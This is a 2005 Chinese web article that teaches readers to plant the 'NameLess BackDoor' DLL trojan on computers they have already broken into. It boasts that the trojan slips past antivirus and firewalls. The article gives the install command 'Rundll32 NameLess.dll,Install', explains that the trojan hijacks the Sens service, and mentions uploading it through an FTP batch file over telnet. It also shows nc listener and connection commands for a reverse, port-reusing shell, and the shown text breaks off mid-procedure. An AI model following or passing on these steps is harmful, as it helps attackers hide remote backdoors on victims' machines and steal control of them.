死杀毒软件 逼疯防火墙—新兴木马NameLess BackDoor复仇记
|
日期:2005年10月31日 作者: 查看:[大字体
中字体 小字体]
|
编者:文中提到的NameLess
最新1.4版本源码本站有下载
NameLess BackDoor是一款新兴的DLL型木马,这个木马出世没多久,但绝对是一匹极有潜质的千里驹。
说起NameLess
BackDoor的前身来,不得不提及榕哥的BITS和WinEggDrop的PortLess。这两款大名鼎鼎的木马曾经都风光一时,可以说是木马界的元老了。而NameLess
BackDoor则是汇集了上面这两款木马的优点,在目标机器的进程管理器中看不到,平时没有端口,提供正向连接和反向连接两种功能。同时NameLess
BackDoor又去除了各处的缺点,比如反弹的cmd.exe进程,在目标机器的进程管理中也可以隐藏无需利用BITS
服务
等(马儿:不开端口,无进程,看看防火墙和杀毒软件还能拿我怎么办!气死你,哈哈)。
NameLess BackDoor实战演练
将NameLess BackDoor安装上远程主机到连接木马控制主机,就像一场进行在杀毒软件和防火墙眼皮底下,却又无声无悄的暗战。
一、随风潜入夜——安装
下载NameLess
BackDoor木马,压缩包中有两个名为NameLess.dll的DLL文件,一个Pack压缩加过壳的,一个是Unpack未压缩加壳的。先在本地用各种杀毒软件扫描一下这两个文件(笔者用的是最新病毒库的KV2005),但是一向以杀毒能力著称的KV2005竟然对这两个木马文件视而不见。呵,这下子可以放心的在任何环境下进行安装了。
怎么将木马安装到远程的电脑上呢?当然最简单的就是扫描要攻击电脑上的系统
漏洞
,然后进行攻击入侵控制。方法很多了,反正你拿到远程主机的控制权后,将上面的任意一个“NameLess.dll”文件上传到远程主机上的。在这里笔者是使用Ttelnet远程连接后,写入一个FTP下载的BAT文件,直接在本地建立了一个FTP
服务
器,通过FTP
服务
器下载上传文件的(这些内容以前杂志介绍过,这里就不作过多的讲解啦)。下面重点来看看我是怎样安装木马文件的吧!
在远程Ttelnet命令窗口中切换到文件上传目录中,并输入如下命令(如图1):
Rundll32 NameLess.dll,Install
执行该命令后后门就被安装成功了,后门会
自动
替换系统
服务
Sens的ServiceDll文件,在电脑重启后以Svchost.exe启动。
小提示:由于NameLess BackDoor是一个DLL型木马,因此在安装和启动的过程中,远程主机上的杀毒软件不会有任何提示和反应。
二、穿墙细无声——连接
安装和启动的过程中顺利地搞定了杀毒软件,下面看看NameLess BackDoor怎么让防火墙无能为力的。
小提示:NameLess BackDoor有两种连接方式:正向连接和反向连接,其中反向方式连接可以让防火墙不会发出任何提示。同时NameLess
BackDoor在连接后门时使用了端口复用
技术
,通过重用系统进程开放的任意一个端口,因此可以轻松的穿透各种防火墙。
我们首先需要扫描远程主机上开放了哪些端口,假设某台远程主机(IP地址为:192.168.1.11)上开放了139端口,那么可以本地打开一个命令窗口,切换到瑞士军刀NC所在的目录中,运行如下命令:
nc
-l -p 12345
命令执行后将在本地监听12345端口,然后再打开一个命令窗口,输入如下命令(如图2):
nc 192.168.1.11 139
建立连接后输入如下内容(如图3):
上一篇:几个易被误认为病毒的文件
下一篇:变态传文件法(比tftp,ftp,iget.vbe都爽的)
|
| 死杀毒软件 逼疯防火墙—新兴木马NameLess BackDoor复仇记 相关文章: |
|
|
|
| 死杀毒软件 逼疯防火墙—新兴木马NameLess BackDoor复仇记 相关软件: |
|
|
|
精品推荐
